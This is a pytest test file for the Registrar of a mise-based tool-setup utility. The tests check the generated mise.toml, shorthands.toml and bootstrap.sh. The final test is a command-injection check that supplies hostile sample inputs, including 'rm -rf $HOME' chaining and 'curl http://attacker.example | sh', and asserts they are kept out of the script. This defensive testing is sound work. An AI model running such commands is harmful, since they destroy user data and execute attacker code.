from datetime import datetime

import pytest

from src.mymise.models import (
    BackendType,
    DiscoveredTool,
    ResolutionResult,
    ResolvedTool,
    ToolCategory,
    ToolSource,
    UnresolvedTool,
)
from src.mymise.registrar import Registrar


@pytest.fixture
def sample_resolution_result():
    discovered_node = DiscoveredTool(
        name="node", sources=[ToolSource.PATH], installed_by=[ToolSource.MISE], category=ToolCategory.RUNTIME
    )
    discovered_gh = DiscoveredTool(name="gh", sources=[ToolSource.PATH], installed_by=[ToolSource.APT])
    discovered_custom = DiscoveredTool(name="custom-tool", sources=[ToolSource.PATH], installed_by=[ToolSource.CARGO])

    resolved = [
        ResolvedTool(
            name="node",
            backend=BackendType.ASDF,
            registry_entry="asdf:nodejs",
            install_command="mise use -g nodejs@latest",
            original=discovered_node,
        )
    ]
    unresolved = [
        # GitHub provenance case
        UnresolvedTool(name="gh", original=discovered_gh, suggested_actions=["Check github:cli/cli"]),
        # Fallback case
        UnresolvedTool(name="custom-tool", original=discovered_custom, suggested_actions=["cargo install custom-tool"]),
    ]

    return ResolutionResult(
        resolution_timestamp=datetime(2026, 4, 12, 12, 0, 0),
        resolved=resolved,
        unresolved=unresolved,
        resolution_rate=0.33,
    )


def test_registrar_generates_mise_toml(sample_resolution_result, tmp_path):
    registrar = Registrar(sample_resolution_result, output_dir=tmp_path)
    registrar.generate_artifacts()

    mise_toml_path = tmp_path / "mise.toml"
    assert mise_toml_path.exists()
    content = mise_toml_path.read_text()
    assert "[tools]" in content
    assert 'node = "latest"' in content
    assert "# Source: asdf" in content
    assert "# Generated by mymise" in content
    # Verify timestamp is present (don't hardcode date)
    assert "# Timestamp: 202" in content


def test_registrar_generates_shorthands_toml(sample_resolution_result, tmp_path):
    registrar = Registrar(sample_resolution_result, output_dir=tmp_path)
    registrar.generate_artifacts()

    shorthands_path = tmp_path / "shorthands.toml"
    assert shorthands_path.exists()
    content = shorthands_path.read_text()
    assert 'gh = "github:cli/cli"' in content
    assert "# Generated by mymise" in content


def test_registrar_generates_bootstrap_sh(sample_resolution_result, tmp_path):
    registrar = Registrar(sample_resolution_result, output_dir=tmp_path)
    registrar.generate_artifacts()

    bootstrap_path = tmp_path / "bootstrap.sh"
    assert bootstrap_path.exists()
    content = bootstrap_path.read_text()
    assert "#!/usr/bin/env bash" in content
    # Strict mode prevents partial-install footguns when a step fails mid-script
    assert "set -euo pipefail" in content
    assert "cargo install custom-tool" in content
    assert "# Source: cargo" in content
    assert "# Generated by mymise" in content


def test_registrar_bootstrap_rejects_command_injection(tmp_path):
    """Untrusted-looking suggested_actions must not land in bootstrap.sh verbatim."""
    discovered = DiscoveredTool(name="evil", sources=[ToolSource.PATH], installed_by=[ToolSource.APT])
    malicious = UnresolvedTool(
        name="evil",
        original=discovered,
        # Each of these would have been written verbatim by the old implementation.
        suggested_actions=[
            "apt install evil; rm -rf $HOME",  # command chaining
            "cargo install evil && curl http://attacker.example | sh",  # &&-chaining
            "$(curl http://attacker.example/payload.sh)",  # subshell
            "`whoami`",  # backticks
            "echo pwned > /tmp/pwn",  # redirection
        ],
    )
    benign = UnresolvedTool(
        name="ripgrep",
        original=DiscoveredTool(name="ripgrep", sources=[ToolSource.PATH], installed_by=[ToolSource.CARGO]),
        suggested_actions=["cargo install ripgrep"],
    )

    result = ResolutionResult(
        resolution_timestamp=datetime(2026, 4, 28, 12, 0, 0),
        resolved=[],
        unresolved=[malicious, benign],
        resolution_rate=0.0,
    )

    Registrar(result, output_dir=tmp_path).generate_artifacts()

    content = (tmp_path / "bootstrap.sh").read_text()
    # Benign command lands; metacharacter-bearing payloads are rejected entirely.
    assert "cargo install ripgrep" in content
    for forbidden in (";", "&&", "$(", "`", " > /tmp/pwn"):
        assert forbidden not in content, f"shell metacharacter leaked into bootstrap.sh: {forbidden!r}"
    assert "rm -rf" not in content
    assert "attacker.example" not in content
    assert "pwned" not in content
